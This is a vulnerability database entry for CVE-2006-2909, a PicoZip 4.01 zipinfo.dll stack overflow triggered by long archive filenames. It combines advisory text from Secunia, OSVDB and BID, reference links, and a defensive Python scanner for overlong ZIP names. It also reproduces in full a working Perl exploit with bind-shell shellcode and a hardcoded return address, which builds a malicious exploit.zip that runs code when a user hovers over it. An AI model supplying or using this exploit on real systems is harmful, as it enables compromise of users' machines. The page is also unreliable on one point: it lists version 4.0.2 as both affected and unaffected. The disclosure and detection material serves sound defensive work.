CVE-2006-2909
CVSS 7.5
Published: 2006-06-16 06:02:00
Revised: 2011-03-07 21:37:17

[Original] Stack-based buffer overflow in the info tip shell extension (zipinfo.dll) in PicoZip 4.01 allows remote attackers to execute arbitrary code via a long filename in an (1) ACE, (2) RAR, or (3) ZIP archive, which is triggered when the user moves the mouse over the archive.


[CNNVD] PicoZip Zipinfo.DLL Buffer Overflow Vulnerability (CNNVD-200606-339)

        A stack-based buffer overflow exists in the info tip shell extension (zipinfo.dll) of PicoZip 4.01. A remote attacker can execute arbitrary code via a long filename in an (1) ACE, (2) RAR, or (3) ZIP archive; the overflow is triggered when the user moves the mouse over the archive.
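The overlong-filename pattern described above can be screened for before an archive ever reaches a shell extension. The scanner below is an added example, not code from this page, Secunia, or the vendor; it assumes a 260-byte filename threshold (Windows MAX_PATH) and builds its own sample archives inline, using only filler bytes where the public exploit places a payload.

```python
import io
import struct
import zipfile

# Signatures of the two ZIP header types that carry a filename length field.
LOCAL_SIG, CENTRAL_SIG = b"PK\x03\x04", b"PK\x01\x02"
# Assumed threshold (not from the page): Windows MAX_PATH. Real archives
# rarely approach it, while the public exploit declares a 532-byte name.
NAME_LIMIT = 260

def _headers(data, sig, fixed_len, fnlen_off):
    """Yield (header_offset, declared_filename_length) for each `sig` header.
    Scans raw bytes rather than trusting a ZIP library, so truncated or
    malformed archives are still inspected (screening heuristic: a signature
    inside file data would also match)."""
    pos = data.find(sig)
    while pos != -1 and pos + fixed_len <= len(data):
        (fnlen,) = struct.unpack_from("<H", data, pos + fnlen_off)
        yield pos, fnlen
        pos = data.find(sig, pos + fixed_len)

def scan_zip_names(data, limit=NAME_LIMIT):
    """Return (kind, offset, filename_length) for every local file header
    or central directory entry whose filename length exceeds `limit`."""
    layouts = (("local", LOCAL_SIG, 30, 26),      # fnlen at offset 26 of 30
               ("central", CENTRAL_SIG, 46, 28))  # fnlen at offset 28 of 46
    return [(kind, pos, fnlen)
            for kind, sig, fixed, off in layouts
            for pos, fnlen in _headers(data, sig, fixed, off)
            if fnlen > limit]

def make_zip(names):
    """Constructed sample input: a stored ZIP with one tiny entry per name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name in names:
            zf.writestr(name, b"hello")
    return buf.getvalue()

BENIGN = make_zip(["readme.txt", "docs/notes.txt"])
# Harmless stand-in for a crafted archive: filler only, with the same
# 532-byte filename length the public exploit declares and no payload.
SUSPECT = make_zip(["readme.txt", "A" * 528 + ".txt"])

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, "->", scan_zip_names(blob) or "clean")
```

Both the local file header and the central directory entry of the crafted file are reported, so the check still fires if one of the two copies has been tampered with.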

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or resource access may be interrupted]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2909
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2909
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-339
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/18425
(PATCH)  BID  18425
http://www.securityfocus.com/archive/1/archive/1/437103/100/0/threaded
(PATCH)  BUGTRAQ  20060614 Secunia Research: PicoZip "zipinfo.dll" Multiple Archives BufferOverflow
http://secunia.com/secunia_research/2006-42/advisory/
(VENDOR_ADVISORY)  MISC  http://secunia.com/secunia_research/2006-42/advisory/
http://secunia.com/advisories/20481
(VENDOR_ADVISORY)  SECUNIA  20481
http://www.vupen.com/english/advisories/2006/2330
(UNKNOWN)  VUPEN  ADV-2006-2330
http://www.picozip.com/changelog.html
(UNKNOWN)  CONFIRM  http://www.picozip.com/changelog.html
http://xforce.iss.net/xforce/xfdb/27096
(UNKNOWN)  XF  picozip-zipinfo-bo(27096)
http://www.securityfocus.com/archive/1/archive/1/437450/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060616 Re: Secunia Research: PicoZip "zipinfo.dll" Multiple Archives BufferOverflow
http://www.osvdb.org/26447
(UNKNOWN)  OSVDB  26447
http://securitytracker.com/id?1016308
(UNKNOWN)  SECTRACK  1016308
http://securityreason.com/securityalert/1104
(UNKNOWN)  SREASON  1104

- Vulnerability information

PicoZip Zipinfo.DLL Buffer Overflow Vulnerability
High  Buffer overflow
2006-06-16 00:00:00 2006-06-16 00:00:00
Remote
        A stack-based buffer overflow exists in the info tip shell extension (zipinfo.dll) of PicoZip 4.01. A remote attacker can execute arbitrary code via a long filename in an (1) ACE, (2) RAR, or (3) ZIP archive; the overflow is triggered when the user moves the mouse over the archive.

- Advisories and patches

        The vendor has released version 4.0.2 to address this issue; please see the reference section for further details.
        http://www.picozip.com/download_PicoZipSetup.html


- Vulnerability information (1917)

Pico Zip 4.01 (Long Filename) Buffer Overflow Exploit (EDBID:1917)
windows local
2006-06-15 Verified
0 c0rrupt
N/A
#!/usr/bin/perl
# Pico Zip v. 4.01 Long Filename Buffer Overflow
# Original advisory - http://www.securityfocus.com/archive/1/437103/30/30/threaded
# Author - c0rrupt
# Greets - sh0uts to n0limit, muts, and brax for the music ;)
#
# The vulnerability is caused due to a boundary error within the
# "zipinfo.dll" info tip shell extension when reading an ACE, RAR, or
# ZIP archive that contains a file with an overly long filename. This
# can be exploited to cause a stack-based buffer overflow when the user
# moves the mouse cursor over a malicious archive either in Windows
# Explorer or from any program that uses the file-open dialog box.
#
# Running this script will generate a malformed zip file that will execute
# the given shellcode when a user moves his cursor over the file.
# (This exploit bypasses stack protection and DEP)

$offset = "\x6F\xE2\xD7\x5A"; #Windows XP SP2 English

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = 
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa3".
"\x52\xaa\x9a\x83\xeb\xfc\xe2\xf4\x5f\x38\x41\xd7\x4b\xab\x55\x65".
"\x5c\x32\x21\xf6\x87\x76\x21\xdf\x9f\xd9\xd6\x9f\xdb\x53\x45\x11".
"\xec\x4a\x21\xc5\x83\x53\x41\xd3\x28\x66\x21\x9b\x4d\x63\x6a\x03".
"\x0f\xd6\x6a\xee\xa4\x93\x60\x97\xa2\x90\x41\x6e\x98\x06\x8e\xb2".
"\xd6\xb7\x21\xc5\x87\x53\x41\xfc\x28\x5e\xe1\x11\xfc\x4e\xab\x71".
"\xa0\x7e\x21\x13\xcf\x76\xb6\xfb\x60\x63\x71\xfe\x28\x11\x9a\x11".
"\xe3\x5e\x21\xea\xbf\xff\x21\xda\xab\x0c\xc2\x14\xed\x5c\x46\xca".
"\x5c\x84\xcc\xc9\xc5\x3a\x99\xa8\xcb\x25\xd9\xa8\xfc\x06\x55\x4a".
"\xcb\x99\x47\x66\x98\x02\x55\x4c\xfc\xdb\x4f\xfc\x22\xbf\xa2\x98".
"\xf6\x38\xa8\x65\x73\x3a\x73\x93\x56\xff\xfd\x65\x75\x01\xf9\xc9".
"\xf0\x01\xe9\xc9\xe0\x01\x55\x4a\xc5\x3a\xbb\xc6\xc5\x01\x23\x7b".
"\x36\x3a\x0e\x80\xd3\x95\xfd\x65\x75\x38\xba\xcb\xf6\xad\x7a\xf2".
"\x07\xff\x84\x73\xf4\xad\x7c\xc9\xf6\xad\x7a\xf2\x46\x1b\x2c\xd3".
"\xf4\xad\x7c\xca\xf7\x06\xff\x65\x73\xc1\xc2\x7d\xda\x94\xd3\xcd".
"\x5c\x84\xff\x65\x73\x34\xc0\xfe\xc5\x3a\xc9\xf7\x2a\xb7\xc0\xca".
"\xfa\x7b\x66\x13\x44\x38\xee\x13\x41\x63\x6a\x69\x09\xac\xe8\xb7".
"\x5d\x10\x86\x09\x2e\x28\x92\x31\x08\xf9\xc2\xe8\x5d\xe1\xbc\x65".
"\xd6\x16\x55\x4c\xf8\x05\xf8\xcb\xf2\x03\xc0\x9b\xf2\x03\xff\xcb".
"\x5c\x82\xc2\x37\x7a\x57\x64\xc9\x5c\x84\xc0\x65\x5c\x65\x55\x4a".
"\x28\x05\x56\x19\x67\x36\x55\x4c\xf1\xad\x7a\xf2\x53\xd8\xae\xc5".
"\xf0\xad\x7c\x65\x73\x52\xaa\x9a";



$filename = $shellcode . "A"x(524-length($shellcode)) . $offset;


$head   = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00".
          "\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00".
          "\x00\x00\x00\x00\x00\x00\x14\x02\x00\x00";

$middle = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00".
          "\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34".
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
          "\x00\x00\x14\x02\x00\x00\x00\x00\x00\x00".
          "\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00";

$tail   = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00".
          "\x00\x00\x01\x00\x01\x00\x42\x02\x00\x00".
          "\x32\x02\x00\x00\x00\x00";

$evilzip = $head . $filename . $middle . $filename . $tail;

open(ZIPFILE,">exploit.zip")|| die "cannot open output file";
print(ZIPFILE $evilzip) || die "cannot write to output file";
close(ZIPFILE);

# milw0rm.com [2006-06-15]
		

- Vulnerability information (F47452)

secunia-zipinfo.txt (PacketStormID:F47452)
2006-06-15 00:00:00
Tan Chew Keong  secunia.com
advisory,overflow,arbitrary,shell,code execution
windows
CVE-2006-2909

Secunia Research has discovered a vulnerability in PicoZip version 4.01, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error within the "zipinfo.dll" info tip shell extension when reading an ACE, RAR, or ZIP archive that contains a file with an overly long filename. This can be exploited to cause a stack-based buffer overflow when the user moves the mouse cursor over a malicious archive either in Windows Explorer or from any program that uses the file-open dialog box. Successful exploitation allows arbitrary code execution.

====================================================================== 

                    Secunia Research 14/06/2006

     - PicoZip "zipinfo.dll" Multiple Archives Buffer Overflow -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
Verification.........................................................9

====================================================================== 
1) Affected Software 

* PicoZip version 4.01

Prior versions may also be affected.

====================================================================== 
2) Severity 

Rating: Moderately Critical
Impact: System Access
Where:  Remote

====================================================================== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in PicoZip, which can
be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error within the 
"zipinfo.dll" info tip shell extension when reading an ACE, RAR, or
ZIP archive that contains a file with an overly long filename. This
can be exploited to cause a stack-based buffer overflow when the user
moves the mouse cursor over a malicious archive either in Windows
Explorer or from any program that uses the file-open dialog box.

Successful exploitation allows arbitrary code execution.

====================================================================== 
4) Solution 

Update to version 4.02.
http://www.picozip.com/downloads.html

====================================================================== 
5) Time Table 

06/06/2006 - Initial vendor notification.
07/06/2006 - Initial vendor reply.
14/06/2006 - Public disclosure.

====================================================================== 
6) Credits 

Discovered by Tan Chew Keong, Secunia Research.

====================================================================== 
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2006-2909 for the vulnerability.

Acubix:
http://www.picozip.com/changelog.html

====================================================================== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

====================================================================== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-42/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

    

- Vulnerability information

26447
PicoZip zipinfo.dll Multiple Archive Filename Processing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A remote overflow exists in PicoZip. The 'zipinfo.dll' shell extension fails to safely read the file information of ACE, RAR, or ZIP archives that contain a file with a long filename, resulting in a stack-based overflow. With a specially crafted archive, an attacker can execute arbitrary code, resulting in a loss of integrity.

- Timeline

2006-06-14 Unknown
2006-06-15 Unknown

- Solution

Upgrade to version 4.02 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

- Vulnerability information

PicoZip Zipinfo.DLL Buffer Overflow Vulnerability
Boundary Condition Error 18425
Yes No
2006-06-14 12:00:00 2006-06-16 06:41:00
Tan Chew Keong of Secunia Research disclosed this vulnerability.

- Affected program versions

PicoZip PicoZip 4.0.1
PicoZip PicoZip 4.0.2

- Unaffected program versions

PicoZip PicoZip 4.0.2

- Vulnerability discussion

PicoZip is susceptible to a buffer-overflow vulnerability. The application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.

This issue allows attackers to execute arbitrary machine code in the context of users running the affected application.

Version 4.0.1 of PicoZip is vulnerable to this issue; prior versions may also be affected.

- Exploit

The following exploit is available to demonstrate this issue:

- Solution

The vendor has released version 4.0.2 to address this issue; please see the reference section for further details.

mailto:vuldb@securityfocus.com


PicoZip PicoZip 4.0.1

- Related references

 

 
